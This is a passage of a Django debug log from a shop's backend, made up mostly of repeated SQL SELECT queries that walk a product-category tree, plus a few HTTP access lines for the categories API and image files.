"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:23:03] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 09:23:04] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 09:23:04] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 09:23:59,616 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:23:59,623 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:23:59,626 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:23:59,629 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:23:59,632 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:23:59,635 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:23:59,638 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:23:59,640 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:23:59,643 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:23:59,646 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:23:59,649 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:23:59,651 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:23:59,655 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:23:59,658 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:23:59,661 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:23:59,664 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:23:59,666 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:23:59,668 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:23:59,671 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:23:59,675 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:23:59,677 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:23:59,679 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:23:59,682 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:23:59,684 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:23:59,686 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:23:59,690 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:23:59,692 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:23:59,694 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:23:59,697 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:23:59,699 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:23:59,703 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:23:59,705 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:23:59,707 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:23:59,710 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:23:59,712 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:23:59,717 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:23:59,719 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:23:59,721 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:23:59,724 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:23:59,726 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:23:59,729 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:23:59,732 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:23:59,734 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:23:59,737 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:23:59,740 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:23:59,742 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:23:59] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 09:25:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 09:30:51,556 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:30:51,566 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:30:51,571 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:30:51,574 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:30:51,581 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:30:51,584 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:30:51,587 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:30:51,589 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:30:51,592 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:30:51,596 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:30:51,599 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:30:51,602 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:30:51,604 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:30:51,606 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:30:51,609 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:30:51,613 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:30:51,617 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:30:51,620 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:30:51,625 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:30:51,633 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:30:51,638 utils 4252 